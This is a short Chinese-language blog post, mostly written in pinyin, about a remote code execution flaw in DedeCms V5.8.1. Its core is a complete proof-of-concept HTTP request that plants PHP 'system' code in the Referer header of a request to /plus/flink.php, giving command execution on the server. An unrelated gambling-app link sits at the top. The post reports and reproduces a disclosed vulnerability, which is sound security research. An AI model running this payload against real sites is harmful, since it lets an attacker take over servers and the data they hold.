天博app下载链接

DedeCms V5.8.1 RCE 漏洞

2021-10-1 / 0 评论 技术文章 / Mrxn

benwengongji 794 zi,ganxienindenaixinliulanyupinglun.

zuotianzaiyigelaowaidebokekandaoletadeyipianwenzhang,jiangdejiushidedecms deyulanbanben v5.8.1 cunzai rce loudong(yuanchengdaimazhixingloudong);woganggangfuxianlexia,queshishicunzaide。

dedecms v5.8.1 RCE

poc:


GET /plus/flink.php?dopost=save&c=pwd HTTP/1.1
Host: dedecms.test
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 13904.16.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.25 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
sec-gpc: 1
referer: <?php "system"($c);die;/*
Connection: close


xiangxidedaimashenjikeyikanyuanwen,genzhezouyixiajiuok。

yuanwendizhi:http://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html 

xiazaidizhi:http://github.com/dedecms/dedecms/releases/tag/v5.8.1 

标签: 漏洞 php rce

转载:转载请注明原文链接 - DedeCms V5.8.1 RCE 漏洞


0条回应:“DedeCms V5.8.1 RCE 漏洞”


发表评论

{view_code_no}